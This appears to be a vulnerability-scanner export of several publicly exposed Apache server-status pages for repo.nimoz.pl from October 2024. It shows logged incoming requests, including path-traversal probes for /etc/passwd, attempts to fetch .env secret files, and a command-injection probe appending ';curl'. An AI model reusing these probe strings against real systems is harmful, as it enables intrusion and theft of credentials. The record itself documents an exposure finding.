0.001724443726179610.00.0010.69 206.168.34.60http/1.1 0-109-0/0/1548. 0.001724443476264040.00.0010.02 62.210.101.195http/1.1repo.nimoz.pl:443POST /minio/webrpc HTTP/1.1 0-109-0/0/1771. 0.00172444675797960.00.0013.64 62.210.101.195http/1.1 0-109-0/0/1807. 0.001724443535941140.00.0010.30 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/media-library-assistant/readme.txt HTTP 0-109-0/0/1518. 0.0017244405706390.00.009.92 62.210.101.195http/1.1repo.nimoz.pl:443GET /linusadmin-phpinfo.php HTTP/1.1 0-109-0/0/1844. 0.001724441396253670.00.0013.41 62.210.101.195http/1.1repo.nimoz.pl:443GET /nagiosxi/login.php HTTP/1.1 0-109-0/0/1722. 0.001724443796146670.00.0010.52 62.210.101.195http/1.1repo.nimoz.pl:443POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 0-109-0/0/1669. 0.001724441895973360.00.0011.89 62.210.101.195http/1.1repo.nimoz.pl:443GET /prweb/ HTTP/1.1 0-109-0/0/1712. 0.001724441395647060.00.0012.91 62.210.101.195http/1.1repo.nimoz.pl:443GET /user/login HTTP/1.1 0-109-0/0/1577. 0.001724442915690170.00.009.89 62.210.101.195http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 0-109-0/0/1724. 0.001724442935516120.00.0010.24 62.210.101.195http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 0-109-0/0/1697. 0.00172444685812640.00.0011.67 62.210.101.195http/1.1repo.nimoz.pl:443GET /login HTTP/1.1 0-109-0/0/1625. 0.00172444476138260.00.0013.30 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-109-0/0/1656. 0.001724444555607750.00.009.68 62.210.101.195http/1.1repo.nimoz.pl:443GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwi 0-109-0/0/1578. 0.00172444645814460.00.009.91 5.181.190.29http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-109-0/0/1753. 0.001724443286449130.00.0010.31 62.210.101.195http/1.1repo.nimoz.pl:443GET /user/login HTTP/1.1 0-109-0/0/1662. 0.001724441385870190.00.0010.94 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-109-0/0/1653. 0.001724443706142000.00.0010.16 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-109-0/0/1635. 0.001724441765881530.00.0010.31 62.210.101.195http/1.1repo.nimoz.pl:443GET /goanywhere/auth/Login.xhtml HTTP/1.1 0-109-0/0/1750. 0.001724441075946330.00.0014.50 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 1-11173400/117/1748W 3.86006595590.04.0814.21 142.93.0.66http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-11173400/38/1481_ 3.8533605626680.00.0810.66 141.98.11.79http/1.1 1-11173400/31/1502_ 3.911185813320.00.0511.87 142.93.0.66http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-11173400/29/1604_ 3.85006155870.00.0610.21 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 1-11173400/37/1631_ 3.920185881280.00.0613.70 142.93.0.66http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-11173400/29/1722_ 3.911196383980.00.0812.44 142.93.0.66http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-11173400/38/1541_ 3.862275822440.00.0710.67 142.93.0.66http/1.1 1-11173400/71/1676_ 3.84306062550.00.7411.04 142.93.0.66http/1.1 1-11173400/29/1651_ 3.85305618290.00.0610.25 142.93.0.66http/1.1 1-11173400/33/1636_ 3.813285867330.00.0711.74 142.93.0.66h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-11173400/32/1650_ 3.85305846700.00.0310.69 142.93.0.66http/1.1 1-11173400/59/1653_ 3.844255889830.00.9010.86 142.93.0.66h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-11173400/25/1756_ 3.744236411700.00.0411.68 142.93.0.66h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-11173400/30/1574_ 3.85405752190.00.0610.24 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-11173400/39/1621_ 3.83233296291260.00.1610.53 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-11173400/33/1630_ 3.8723405775070.00.0710.33 193.32.162.34http/1.1vm-repo-prd.nimoz.local:80GET /command_port.ini HTTP/1.1 1-11173400/28/1593_ 3.874285653680.00.059.94 142.93.0.66http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-11173400/38/1522_ 3.8733605744200.00.0611.12 141.98.11.79http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-11173400/26/1513_ 3.8588705714090.00.0510.14 141.98.11.90http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-11173400/29/1655_ 3.8689205734230.00.0510.95 149.50.103.48http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-11173400/33/1650_ 3.8588705899810.00.5410.93 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-mask.svg HTTP/1.1 1-11173400/37/1709_ 3.85197805553960.00.0410.10 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-mask.svg HTTP/1.1 1-11173400/40/1617_ 3.85111906078010.00.069.95 91.238.181.71http/1.1 1-11173400/33/1673_ 3.85197805991200.00.0812.35 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 1-11173400/40/1513_ 3.84005601820.00.239.79
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448e68b03bf
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Monday, 07-Oct-2024 22:05:20 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 87 Parent Server MPM Generation: 86 Server uptime: 109 days 9 hours 32 minutes 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 209227 - Total Traffic: 1.3 GB - Total Duration: 78013934 CPU Usage: u182.02 s144.12 cu532.18 cs37.94 - .00948% CPU load .0221 requests/sec - 150 B/second - 6.6 kB/request - 372.867 ms/request 1 requests currently being processed, 24 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02640no (old gen)0yes025000 1794no (old gen)0yes025000 215904no0yes124000 5795no (old gen)0yes025000 Sum400 199000 __________________________________________________W_____________ ___________..................................................___ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-10926400/107/1749_ 8.06316641715764930.01.1911.99 62.210.101.195http/1.1repo.nimoz.pl:443POST /minio/webrpc HTTP/1.1 0-10926400/142/1603_ 8.20316623245731020.01.0710.47 62.210.101.195http/1.1repo.nimoz.pl:443GET /login/ HTTP/1.1 0-10926400/152/1676_ 8.2631662425579130.01.3611.24 62.210.101.195http/1.1repo.nimoz.pl:443POST /app HTTP/1.1 0-10926400/168/1770_ 8.18316641625795840.01.3110.94 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/canto/readme.txt HTTP/1.1 0-10926400/215/1738_ 8.25316643326340250.01.2711.09 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1 0-10926400/178/1680_ 8.20301103726179610.01.3210.69 206.168.34.60http/1.1 0-10926400/124/1548_ 8.20316623476264040.01.1610.02 62.210.101.195http/1.1repo.nimoz.pl:443POST /minio/webrpc HTTP/1.1 0-10926400/125/1771_ 8.1222610675797960.01.3313.64 62.210.101.195http/1.1 0-10926400/199/1807_ 8.20316643535941140.01.2910.30 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/media-library-assistant/readme.txt HTTP 0-10926400/133/1518_ 8.083166405706390.01.249.92 62.210.101.195http/1.1repo.nimoz.pl:443GET /linusadmin-phpinfo.php HTTP/1.1 0-10926400/212/1844_ 8.25100621396253670.01.5413.41 62.210.101.195http/1.1repo.nimoz.pl:443GET /nagiosxi/login.php HTTP/1.1 0-10926400/149/1722_ 8.25316643796146670.01.1710.52 62.210.101.195http/1.1repo.nimoz.pl:443POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 0-10926400/169/1669_ 8.21316641895973360.01.4211.89 62.210.101.195http/1.1repo.nimoz.pl:443GET /prweb/ HTTP/1.1 0-10926400/195/1712_ 8.25316641395647060.01.4412.91 62.210.101.195http/1.1repo.nimoz.pl:443GET /user/login HTTP/1.1 0-10926400/124/1577_ 8.20316642915690170.01.309.89 62.210.101.195http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 0-10926400/172/1724_ 8.20316642935516120.01.2010.24 62.210.101.195http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 0-10926400/137/1697_ 8.1231663685812640.01.2211.67 62.210.101.195http/1.1repo.nimoz.pl:443GET /login HTTP/1.1 0-10926400/143/1625_ 8.1831664476138260.01.4413.30 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-10926400/127/1656_ 7.81316644555607750.01.269.68 62.210.101.195http/1.1repo.nimoz.pl:443GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwi 0-10926400/118/1578_ 8.2522610645814460.01.119.91 5.181.190.29http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-10926400/139/1753_ 8.25316633286449130.01.2110.31 62.210.101.195http/1.1repo.nimoz.pl:443GET /user/login HTTP/1.1 0-10926400/163/1662_ 8.25100621385870190.01.2110.94 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-10926400/116/1653_ 8.25316643706142000.01.2610.16 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-10926400/153/1635_ 8.21316641765881530.01.3510.31 62.210.101.195http/1.1repo.nimoz.pl:443GET /goanywhere/auth/Login.xhtml HTTP/1.1 0-10926400/185/1750_ 8.21316641075946330.01.3714.50 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 1-1097940/306/1621_ 20.65301144225942220.02.9910.07 206.168.34.60h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1097940/335/1435_ 20.8220335185561070.03.0710.53 162.142.125.208http/1.1 1-1097940/294/1443_ 20.91316624795745840.03.0610.99 62.210.101.195http/1.1repo.nimoz.pl:443POST /soap.cgi?service=whatever-control;curl HTTP/1.1 1-1097940/327/1571_ 20.7816535226129270.02.9410.12 62.210.101.195http/1.1repo.nimoz.pl:443GET /.env.prod HTTP/1.1 1-1097940/296/1587_ 20.9531662255829160.03.0013.63 62.210.101.195http/1.1repo.nimoz.pl:443GET /app?service=page/PrinterList HTTP/1.1 1-1097940/308/1686_ 20.7203006349130.03.0812.33 62.210.101.195http/1.1repo.nimoz.pl:443GET /exchange/index.html HTTP/1.1 1-1097940/307/1494_ 20.9816535305741500.02.9110.57 64.62.156.18http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-1097940/306/1600_ 21.062235982720.03.0210.28 206.189.233.36http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-1097940/361/1607_ 20.870565585580.03.0810.10 62.210.101.195http/1.1repo.nimoz.pl:443GET /global-protect/portal/images/2n6iEZ7HjJ8AZD6lC15ZDp7ww3P.t 1-1097940/319/1589_ 20.8131662375837300.03.0611.56 62.210.101.195http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-1097940/300/1613_ 21.071225794860.02.9610.63 206.189.233.36http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 1-1097940/334/1581_ 20.8567032855826250.02.909.86 185.242.226.7http/1.1 1-1097940/261/1720_ 20.65301074376390200.02.9711.59 206.168.34.60http/1.1 1-1097940/282/1538_ 21.0251005702170.02.5710.13 8.216.121.252http/1.1repo.nimoz.pl:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-1097940/291/1575_ 20.91203433056216710.03.2910.34 62.210.101.195http/1.1repo.nimoz.pl:443POST /index.php?c=blocked&action=continue HTTP/1.1 1-1097940/304/1588_ 20.9241715722210.02.9410.22 206.189.233.36h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1097940/300/1554_ 20.9431662225625920.02.979.80 62.210.101.195http/1.1repo.nimoz.pl:443POST /app HTTP/1.1 1-1097940/297/1477_ 20.925101675681120.04.0311.00 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/under-construction-maintenance-mode/rea 1-1097940/263/1475_ 21.01670305683250.02.8210.03 185.242.226.7http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-1097940/325/1617_ 21.090245692010.02.9310.86 206.189.233.36http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1097940/367/1609_ 20.9720343265854520.03.0310.34 162.142.125.208http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-1097940/294/1660_ 20.8314279245461470.02.9810.01 154.212.141.189h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1097940/317/1570_ 20.91142843956012740.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4487408e703
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Saturday, 05-Oct-2024 23:26:41 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 108 Parent Server MPM Generation: 107 Server uptime: 107 days 10 hours 53 minutes 33 seconds Server load: 0.00 0.00 0.00 Total accesses: 166086 - Total Traffic: 1.1 GB - Total Duration: 58897271 CPU Usage: u127.75 s137.72 cu480.62 cs34.47 - .00841% CPU load .0179 requests/sec - 122 B/second - 6.7 kB/request - 354.619 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 215904no (old gen)0yes025000 326516no0yes025000 526517no0yes124000 Sum300 174000 ..................................................______________ ____________________________________.........................___ __W___________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-103-0/0/1411. 0.003435971574674340.00.0010.35 62.210.101.198http/1.1repo.nimoz.pl:443GET /misc/about.jsp HTTP/1.1 0-103-0/0/1305. 0.0034359704587250.00.008.99 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.production HTTP/1.1 0-103-0/0/1384. 0.003435971474350940.00.009.46 62.210.101.198http/1.1repo.nimoz.pl:443GET /signin HTTP/1.1 0-103-0/0/1433. 0.0034359704634560.00.009.19 62.210.101.198http/1.1 0-103-0/0/1380. 0.0034359704979480.00.009.42 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /../../../..//etc/passwd HTTP/1.1 0-103-0/0/1308. 0.0034359705007220.00.008.88 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env_1 HTTP/1.1 0-103-0/0/1286. 0.003435971644933840.00.008.50 62.210.101.198http/1.1repo.nimoz.pl:443GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPh 0-103-0/0/1407. 0.0034359704579960.00.0011.72 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-mask.svg HTTP/1.1 0-103-0/0/1481. 0.0034359704692720.00.008.60 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.stage HTTP/1.1 0-103-0/0/1251. 0.0034359704534250.00.008.27 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.save HTTP/1.1 0-103-0/0/1477. 0.0034359705120320.00.0011.35 3.125.18.160http/1.1 0-103-0/0/1414. 0.0034359704825870.00.008.93 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /static/..%5c..%5cetc/passwd HTTP/1.1 0-103-0/0/1364. 0.0034359704670460.00.0010.05 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /api/.env HTTP/1.1 0-103-0/0/1383. 0.003435972254447310.00.0010.99 62.210.101.198http/1.1repo.nimoz.pl:443GET /KaseyaCwWebService/ManagedIT.asmx HTTP/1.1 0-103-0/0/1294. 0.0034359704490210.00.008.16 3.125.18.160http/1.1 0-103-0/0/1371. 0.0034359704471230.00.008.62 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/ HTTP/1.1 0-103-0/0/1437. 0.00343597464622470.00.0010.05 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1359. 0.00343597184862000.00.0011.45 62.210.101.198http/1.1repo.nimoz.pl:443GET /wp-admin/install.php HTTP/1.1 0-103-0/0/1351. 0.0034359704475850.00.007.99 45.156.129.71http/1.1 0-103-0/0/1332. 0.00343597274601770.00.008.42 62.210.101.198http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-103-0/0/1462. 0.0034359705294500.00.008.70 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-touch.png HTTP/1.1 0-103-0/0/1389. 0.0034359704791240.00.009.33 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 0-103-0/0/1304. 0.00343597414799810.00.008.32 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1333. 0.00343597264613610.00.008.48 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1430. 0.0034359704779930.00.0012.70 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-103-0/0/990. 0.0034359703634920.00.005.87 45.156.129.70http/1.1 1-103-0/0/874. 0.0034359703315950.00.006.41 64.62.197.68h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/887. 0.0034359703319990.00.006.81 162.142.125.212http/1.1 1-103-0/0/874. 0.00343597183799340.00.005.81 62.210.101.198http/1.1repo.nimoz.pl:443GET /?feed=rss2 HTTP/1.1 1-103-0/0/993. 0.003435973543532490.00.009.37 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/1048. 0.003435972803902850.00.007.95 197.36.134.15http/1.1 1-103-0/0/896. 0.003435972243481250.00.006.45 64.62.197.71http/1.1 1-103-0/0/1023. 0.0034359703582180.00.006.16 45.156.129.70http/1.1 1-103-0/0/903. 0.0034359703255610.00.005.68 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/957. 0.00343597203574680.00.007.20 62.210.101.198http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-103-0/0/1036. 0.0034359703295590.00.006.53 3.125.18.160http/1.1 1-103-0/0/929. 0.0034359703650320.00.005.72 185.224.128.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/1069. 0.003435971514113830.00.007.19 62.210.101.198http/1.1repo.nimoz.pl:443GET /api/v3/meta HTTP/1.1 1-103-0/0/1004. 0.0034359703550940.00.006.57 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /php2.php HTTP/1.1 1-103-0/0/968. 0.003435973093838400.00.005.72 95.214.55.43http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/944. 0.00343597253465460.00.006.00 45.156.129.72http/1.1 1-103-0/0/963. 0.0034359703366650.00.005.73 45.156.129.70http/1.1 1-103-0/0/948. 0.00343597163453900.00.006.11 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/903. 0.0034359703323520.00.005.91 209.38.136.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/966. 0.0034359703386170.00.006.67 167.94.138.51http/1.1 1-103-0/0/931. 0.0034359703618870.00.005.91 64.227.146.243h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/1024. 0.00343597303125630.00.005.87 45.156.128.43http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-103-0/0/965. 0.0034359703787990.00.006.03 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 1-103-0/0/995. 0.00343597203405150.00.007.86 64.227.146.243http/1.1 1-103-0/0/907. 0.0034359703200680.00.005.47 209.38.136.79http/1.1 2-86159040/1308/1783_ 74.634603494943000.07.5411.30 103.207.36.74http/1.1repo.nimoz.pl:443POST / HTTP/1.1 2-86159040/1291/1708_ 74.60<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448102a2079
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 04-Oct-2024 01:01:55 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 107 Parent Server MPM Generation: 106 Server uptime: 105 days 12 hours 28 minutes 47 seconds Server load: 0.08 0.02 0.01 Total accesses: 165575 - Total Traffic: 1.1 GB - Total Duration: 58891530 CPU Usage: u124.25 s134.76 cu479.04 cs34.37 - .00847% CPU load .0182 requests/sec - 124 B/second - 6.7 kB/request - 355.679 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 215904no (old gen)0yes025000 323498no0yes124000 523499no0yes025000 Sum300 174000 ..................................................______________ ___________________________W________.........................___ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-103-0/0/1411. 0.001765101574674340.00.0010.35 62.210.101.198http/1.1repo.nimoz.pl:443GET /misc/about.jsp HTTP/1.1 0-103-0/0/1305. 0.0017651004587250.00.008.99 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.production HTTP/1.1 0-103-0/0/1384. 0.001765101474350940.00.009.46 62.210.101.198http/1.1repo.nimoz.pl:443GET /signin HTTP/1.1 0-103-0/0/1433. 0.0017651004634560.00.009.19 62.210.101.198http/1.1 0-103-0/0/1380. 0.0017651004979480.00.009.42 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /../../../..//etc/passwd HTTP/1.1 0-103-0/0/1308. 0.0017651005007220.00.008.88 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env_1 HTTP/1.1 0-103-0/0/1286. 0.001765101644933840.00.008.50 62.210.101.198http/1.1repo.nimoz.pl:443GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPh 0-103-0/0/1407. 0.0017651004579960.00.0011.72 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-mask.svg HTTP/1.1 0-103-0/0/1481. 0.0017651004692720.00.008.60 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.stage HTTP/1.1 0-103-0/0/1251. 0.0017651004534250.00.008.27 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.save HTTP/1.1 0-103-0/0/1477. 0.0017651005120320.00.0011.35 3.125.18.160http/1.1 0-103-0/0/1414. 0.0017651004825870.00.008.93 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /static/..%5c..%5cetc/passwd HTTP/1.1 0-103-0/0/1364. 0.0017651004670460.00.0010.05 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /api/.env HTTP/1.1 0-103-0/0/1383. 0.001765102254447310.00.0010.99 62.210.101.198http/1.1repo.nimoz.pl:443GET /KaseyaCwWebService/ManagedIT.asmx HTTP/1.1 0-103-0/0/1294. 0.0017651004490210.00.008.16 3.125.18.160http/1.1 0-103-0/0/1371. 0.0017651004471230.00.008.62 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/ HTTP/1.1 0-103-0/0/1437. 0.00176510464622470.00.0010.05 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1359. 0.00176510184862000.00.0011.45 62.210.101.198http/1.1repo.nimoz.pl:443GET /wp-admin/install.php HTTP/1.1 0-103-0/0/1351. 0.0017651004475850.00.007.99 45.156.129.71http/1.1 0-103-0/0/1332. 0.00176510274601770.00.008.42 62.210.101.198http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-103-0/0/1462. 0.0017651005294500.00.008.70 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-touch.png HTTP/1.1 0-103-0/0/1389. 0.0017651004791240.00.009.33 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 0-103-0/0/1304. 0.00176510414799810.00.008.32 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1333. 0.00176510264613610.00.008.48 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1430. 0.0017651004779930.00.0012.70 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-103-0/0/990. 0.0017651003634920.00.005.87 45.156.129.70http/1.1 1-103-0/0/874. 0.0017651003315950.00.006.41 64.62.197.68h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/887. 0.0017651003319990.00.006.81 162.142.125.212http/1.1 1-103-0/0/874. 0.00176510183799340.00.005.81 62.210.101.198http/1.1repo.nimoz.pl:443GET /?feed=rss2 HTTP/1.1 1-103-0/0/993. 0.001765103543532490.00.009.37 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/1048. 0.001765102803902850.00.007.95 197.36.134.15http/1.1 1-103-0/0/896. 0.001765102243481250.00.006.45 64.62.197.71http/1.1 1-103-0/0/1023. 0.0017651003582180.00.006.16 45.156.129.70http/1.1 1-103-0/0/903. 0.0017651003255610.00.005.68 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/957. 0.00176510203574680.00.007.20 62.210.101.198http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-103-0/0/1036. 0.0017651003295590.00.006.53 3.125.18.160http/1.1 1-103-0/0/929. 0.0017651003650320.00.005.72 185.224.128.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/1069. 0.001765101514113830.00.007.19 62.210.101.198http/1.1repo.nimoz.pl:443GET /api/v3/meta HTTP/1.1 1-103-0/0/1004. 0.0017651003550940.00.006.57 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /php2.php HTTP/1.1 1-103-0/0/968. 0.001765103093838400.00.005.72 95.214.55.43http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/944. 0.00176510253465460.00.006.00 45.156.129.72http/1.1 1-103-0/0/963. 0.0017651003366650.00.005.73 45.156.129.70http/1.1 1-103-0/0/948. 0.00176510163453900.00.006.11 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/903. 0.0017651003323520.00.005.91 209.38.136.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/966. 0.0017651003386170.00.006.67 167.94.138.51http/1.1 1-103-0/0/931. 0.0017651003618870.00.005.91 64.227.146.243h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/1024. 0.00176510303125630.00.005.87 45.156.128.43http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-103-0/0/965. 0.0017651003787990.00.006.03 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 1-103-0/0/995. 0.00176510203405150.00.007.86 64.227.146.243http/1.1 1-103-0/0/907. 0.0017651003200680.00.005.47 209.38.136.79http/1.1 2-86159040/1305/1780_ 73.7338488224942040.07.5011.26 185.242.226.7http/1.1 2-86159040/1287/1704_ 74.151279504
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44834d0bf00
